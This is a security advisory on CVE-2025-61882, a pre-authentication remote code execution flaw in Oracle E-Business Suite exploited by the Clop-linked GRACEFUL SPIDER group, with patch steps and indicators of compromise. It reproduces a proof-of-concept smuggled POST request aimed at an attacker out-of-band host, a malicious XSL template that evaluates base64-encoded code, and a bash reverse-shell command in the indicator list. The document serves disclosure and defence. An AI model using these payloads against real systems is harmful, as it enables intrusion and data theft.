CVE-2025-61882

Written By Josephino Cambosa

Base Score:  9.8 CRITICAL

Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Who: GRACEFUL SPIDER, a financially-motivated criminal group that is known to use the CIop ransomware

What: A remote code execution vulnerability affecting Oracle E-Business Suite (EBS) versions 12.2.3 through 12.2.14, specifically the BI Publisher Integration component of the Oracle Concurrent Processing product

When: First known exploitation occurred on August 9, 2025

Where: Public-sector networks

Why: This vulnerability is remotely exploitable without authentication and must be patched immediately

Technical Details

The authentication bypass technique involves a HTTP POST request to /OA_HTML/SyncServlet

Next, a series of HTTP requests are issued to the Oracle's XML Publisher Template Manager to take advantage of code execution within a XSLT template.

GET /OA_HTML/RF.jsp?function_id=XDO_TEMPLATES&security_group_id=
GET /OA_HTML/RF.jsp?function_id=XDO_DS_DEFINITIONS&security_group_id=
POST /OA_HTML/OA.jsp?page=oracle/apps/xdo/oa/template/webui/TemplatesHomePG
GET /OA_HTML/OA.jsp?page=oracle/apps/xdo/oa/template/webui/TemplateCopyPG
POST /OA_HTML/OA.jsp?page=oracle/apps/xdo/oa/template/webui/TemplateCopyPG
GET /OA_HTML/OA.jsp?page=oracle/apps/xdo/oa/template/webui/TemplateFileAddPG
POST /OA_HTML/OA.jsp?page=oracle/apps/xdo/oa/template/webui/TemplatePreviewPG

Additionally, the malicious templates in xdo_templates_vl within the Oracle EBS database is known to match URL references for TemplateCode value:

/OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG&TemplateCode=<TEMPLATE_NAME>

Crowdstrike researchers have noted that, “Successful template execution establishes an outbound connection from the Java web server process to attacker-controlled infrastructure over port 443.” This connection was observed in some cases to load a webshell with the goal of establishing persistence on the target device.

The researchers from watchTowr Labs have also demonstrated a proof-of-concept exploit workflow for achieving the full pre-auth RCE chain:

Sending the crafted HTTP requests to the affected component

POST /OA_HTML/configurator/UiServlet HTTP/1.1
Host: not-actually-watchtowr.com-stop-emailing-us-about-iocs:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
CSRF-XHR: YES
FETCH-CSRF-TOKEN: 1
Cookie: JSESSIONID=_NG5Yg8cBERFjA5L23s9UUyzG7G8hSZpYkmc6YAEBjT71alQ2UH6!906988146; EBSDB=oSVgJCh0YacxUZCwOlLajtL2zo
Content-Length: 847
Content-Type: application/x-www-form-urlencoded

redirectFromJsp=1&getUiType=<@urlencode><?xml version="1.0" encoding="UTF-8"?>
<initialize>
    <param name="init_was_saved">test</param>
    <param name="return_url"><http://apps.example.com:7201><@html_entities>/OA_HTML/help/../ieshostedsurvey.jsp HTTP/1.2
Host: attacker-oob-server
User-Agent: anything
Connection: keep-alive
Cookie: JSESSIONID=_NG5Yg8cBERFjA5L23s9UUyzG7G8hSZpYkmc6YAEBjT71alQ2UH6!906988146; EBSDB=oSVgJCh0YacxUZCwOlLajtL2zo
 

POST /</@html_entities></param>
 
    <param name="ui_def_id">0</param>
    <param name="config_effective_usage_id">0</param>
    <param name="ui_type">Applet</param>
</initialize></@urlencode>

Sample Malicious XSL for Arbitrary Code Execution

<xsl:stylesheet version="1.0"
                    xmlns:xsl="<http://www.w3.org/1999/XSL/Transform>"
                    xmlns:b64="<http://www.oracle.com/XSL/Transform/java/sun.misc.BASE64Decoder>"
                    xmlns:jsm="<http://www.oracle.com/XSL/Transform/java/javax.script.ScriptEngineManager>"
                    xmlns:eng="<http://www.oracle.com/XSL/Transform/java/javax.script.ScriptEngine>"
                    xmlns:str="<http://www.oracle.com/XSL/Transform/java/java.lang.String>">
        <xsl:template match="/">
            <xsl:variable name="bs" select="b64:decodeBuffer(b64:new(),'[base64_encoded_payload]')"/>
            <xsl:variable name="js" select="str:new($bs)"/>
            <xsl:variable name="m" select="jsm:new()"/>
            <xsl:variable name="e" select="jsm:getEngineByName($m, 'js')"/>
            <xsl:variable name="code" select="eng:eval($e, $js)"/>
            <xsl:value-of select="$code"/>
        </xsl:template>
    </xsl:stylesheet>

Fix Actions

  1. Confirm the October 2023 Critical Patch Update is applied first, as it is a prerequisite to this patch

  2. Apply the latest patch after reviewing the patch availability information and installation instructions found here
    https://www.oracle.com/security-alerts/alert-cve-2025-61882.html

  3. Search your organization’s Oracle EBS database for malicious templates in xdo_templates_vl matching URL references for the TemplateCode

  4. Scrutinize UserID 0 (sysadmin) and UserID 6 (guest) sessions in icx_sessions

  5. Either isolate or integrate a web application firewall to secure EBS instances

  6. Continue to monitor your network traffic and be aware of Oracle’s published indicators of compromise (see below)

Indicators of Compromise

200[.]107[.]207[.]26      (IP,  Potential GET and POST activity)
185[.]181[.]60[.]11      (IP,  Potential GET and POST activity)
sh -c /bin/bash -i >& /dev/tcp// 0>&1      (Command,     Establish an outbound TCP connection over a specific port)
76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d     (SHA 256,  oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip)
aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121     (SHA 256,     oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py)
6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b      (SHA 256,     oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py)

Summary

According to the 2025 Ponemon Healthcare Cybersecurity Report, nearly 3 in 4 US healthcare organizations report patient care disruption due to cyberattacks. Additionally, over the last two years 96% of organizations experienced at least two data loss or exfiltration incidents involving sensitive healthcare data.

Given that the critical N-day vulnerability in Oracle’s E-Business Suite (EBS) is already being actively exploited by threat actors, it is strongly recommended to take immediate action if your healthcare organization has Oracle E-Business Suite (EBS) versions 12.2.3 through 12.2.14.

References

https://nvd.nist.gov/vuln/detail/CVE-2025-61882

https://www.crowdstrike.com/en-us/blog/crowdstrike-identifies-campaign-targeting-oracle-e-business-suite-zero-day-CVE-2025-61882/

https://www.bleepingcomputer.com/news/security/oracle-patches-ebs-zero-day-exploited-in-clop-data-theft-attacks/

https://labs.watchtowr.com/well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882/

https://www.proofpoint.com/us/resources/threat-reports/ponemon-healthcare-cybersecurity-report

Josephino Cambosa
Next

CVE-2023-1389